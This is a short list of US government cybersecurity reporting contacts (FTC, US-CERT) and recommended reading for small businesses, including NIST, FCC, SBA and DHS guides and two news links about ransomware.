o Report fraud, identity theft, scams or rip-offs to the Federal Trade Commission: http://www.onguardonline.gov/file-complaint

o Report computer or network vulnerabilities to US-CERT via the hotline, 1-888-282-0870, or the US-CERT website: http://www.us-cert.gov/


Recommended Reading

New NIST Guide Helps Small Businesses Improve Cybersecurity

https://www.nist.gov/news-events/news/2016/11/new-nist-guide-helps-small-businesses-

improve-cybersecurity

Federal Communications Commission Cybersecurity for Small Business

https://www.fcc.gov/general/cybersecurity-small-business

NIST - Small Business Information Security: The Fundamentals

https://doi.org/10.6028/NIST.IR.7621r1

U.S. Small Business Administration Cybersecurity Resources for Small Business Owners.

https://www.sba.gov/content/introduction-cybersecurity

Department of Homeland Security: Stop. Think. Connect. Small Business Resources

https://www.dhs.gov/publication/stopthinkconnect-small-business-resources

US Computer Emergency Readiness Team: Resources for Small Businesses

https://www.us-cert.gov/ccubedvp/smb
National Cyber Security Alliance

https://staysafeonline.org/

'Ransomware' scam leaves victims powerless

http://www.wsmv.com/story/27732818/ransomware-scam-leaves-victims-powerless

Images of Samsung Galaxy S7 hacked with Ransomware

https://latesthackingnews.com/2017/03/27/images-samsung-galaxy-s7-hacked-ransomware/